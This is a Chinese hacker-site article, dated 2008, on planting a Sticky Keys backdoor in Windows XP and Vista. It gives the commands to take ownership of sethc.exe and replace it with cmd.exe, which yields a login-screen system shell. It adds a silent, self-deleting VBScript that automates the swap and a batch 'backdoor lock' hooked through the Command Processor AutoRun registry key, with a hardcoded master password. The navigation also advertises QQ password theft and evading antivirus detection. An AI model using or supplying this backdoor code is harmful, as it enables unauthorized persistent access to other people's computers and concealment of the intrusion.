设为首页  加入收藏  联系我们 繁體中文  

黑客软件:

  漏洞扫描 | 木马间谍 | 加密解密 | 远程控制 | 破坏攻击 | 杀毒软件 | 防火墙类 | OICQ专区 | 黑客必备 | 常用工具 | 网吧攻击
文章中心:   最新资讯 | 黑客技术 | 电脑基础 | 菜鸟文摘 | 网络安全 | 网络技巧 | QQ技巧 | OQ空间代码 | 免费资源 | 编程世界 | 建站技术
素材源码:   论坛相关 | ASP源码 | CGI 源码 | NET 源码 | PHP 源码 | 酷站素材 | 字体素材 | 图片素材 | 友情发布 | 网页模版 | 建站软件
教程动画:   黑客教程 | 黑客编程 | 网站入侵 | 菜鸟教程 | 入侵教程 | 破解教程 | 电子书籍 | 网页制作 | 高级会员 | 综合教程 | 本站原创


   

  您当前的位置:中华隐士黑客联盟 -> 黑客技术 -> 漏洞利用 -> 文章内容 [站内搜索]  

 
粘滞键打造入侵Vista系统爆酷后门
作者:不详  来源:网络  发布时间:2008-3-22 9:24:53  发布人:www.hack86.com
粘滞键打造入侵Vista系统爆酷后门  
 

来源:天阳
什么是粘滞键? 
  当你在Windows操作系统里面连续按下5次Shift键之后,你看看出来了什么?
  在windows 2000/xp/Vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。
  一、具体的替换方法:
  XP系统:
  将安装源光盘弹出(或将硬盘上的安装目录改名)   cd %widnir%\system32\dllcache 
ren sethc.exe *.ex~ 
cd %widnir%\system32 
copy /y cmd.exe sethc.exe 
  Vista系统:  takeown /f c:\windows\system32\sethc.exe 
cacls c:\windows\system32\sethc.exe /G administrator:F

  上两步为获得权限的命令,你也可以通过Vista优化大师获得右键菜单的提升权限的功能,然后在sethc.exe文件上面右键直接提升权限。
  然后按XP方法替换文件
  在登录界面按5此SHIFT,出来cmd shell,然后……
  二、后门扩展:  Dim obj, success 
  Set obj = CreateObject("WScript.Shell") 
  success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True) 
  success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True) 
  success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True) 
  success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True) 
  success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True) 
  success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) 
  第二句最有意思了,自动应答....以前就遇到过类似的问题
  再更新,加个自删除、简化代码:   On Error Resume Next 
  Dim obj, success 
  Set obj = CreateObject("WScript.Shell") 
  success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F? %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe? %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) 
  CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) 
  三、后门锁扩展: 

  allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证 
  用下面的后门锁的方法是 把代码保存为bdlock.bat
  然后修改注册表位置即可        [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]  
  "AutoRun"="bdlock.bat"  
  @Echo Off 
  title 后门登陆验证 
  color a 
  cls 
  set temprandom=%RANDOM% 
  echo 请输入验证码:%temprandom% 
  set/p check= 
  if "%check%"=="%temprandom%%temprandom%" goto passcheck 
  if "%check%"=="%temprandom%" ( 
  rem 后门服务器验证 
  rem 如果没有后门验证服务器请rem注释掉下一行代码 
  if exist \192.168.8.8\backdoor$\pass goto passcheck 
  ) 
  echo 验证失败 
  pause 
  exit 
  :passcheck 
  echo 验证成功 
  If "%passcmdlock%"==http://www.6655.com/ Goto endx 
  Set passcmdlock=http://www.6655.com/ 
  :allyesno 
  Set Errorlevel=>nul 
  Echo 请输入验证密码? 
  Set password=allyesno Is a pig>nul 
  Set/p password= 
  rem 万能密码 
  if "%password%"=="allyesno is a sb" goto endx 
  If %time:~1,1%==0 Set timechange=a 
  If %time:~1,1%==1 Set timechange=b 
  If %time:~1,1%==2 Set timechange=c 
  If %time:~1,1%==3 Set timechange=d 
  If %time:~1,1%==4 Set timechange=e 
  If %time:~1,1%==5 Set timechange=f 
  If %time:~1,1%==6 Set timechange=g 
  If %time:~1,1%==7 Set timechange=h 
  If %time:~1,1%==8 Set timechange=i 
  If %time:~1,1%==9 Set timechange=j 
  set/a sum=%time:~1,1%+%time:~1,1% 
  Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul 
  If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End 
  Echo 请联系咨询正确密码!&Goto allyesno 
  :End 
  Set password=>nul 
  Set Errorlevel=>nul 
  :endx  
[] [返回上一页] [打 印] [收 藏]
  [相关文章评论]    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 

 

 
免费获得Q币的最新方法
最新免费在线看的电影网站集绵
不用木马,轻松万能偷daoQQ号码
最新QQ空间4.0全屏版效果图!!
新免蟆Q秀,刷红钻的方法
黑客快速入门(强烈推荐)
QQ密码本地破解的原理和方法
8款QQ空间免费开场动画
18岁少女欲6000元卖处女身 救患血..
免费QQ蓝钻体验(附考试答案)
 
几个用过的入侵技巧整理 03-26
木马免杀全攻略 03-26
另类数据修复恢复被Ghost掉的分区.. 03-26
微软警告Word发现新漏洞 黑客可安.. 03-26
关注暑期病毒特点 让学生在家安.. 03-26
2008年北京奥运会如何做好信息安.. 03-26
清空iis log 中自己登录ip的vbs 03-26
使用Lns杜绝Arp欺骗 03-26
注入下载文件的代码到IE进程然后.. 03-26
没有无线网络设备时如何共享无线.. 03-26
 
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 访客留言 论坛登录
〖中华隐士黑客联盟〗,Copyright © 2006-2010 WwW.Hack86.Com 闽ICP备:06023304号
站长:小质 QQ:771760,软件发布MAIL:Hack086@21cn.com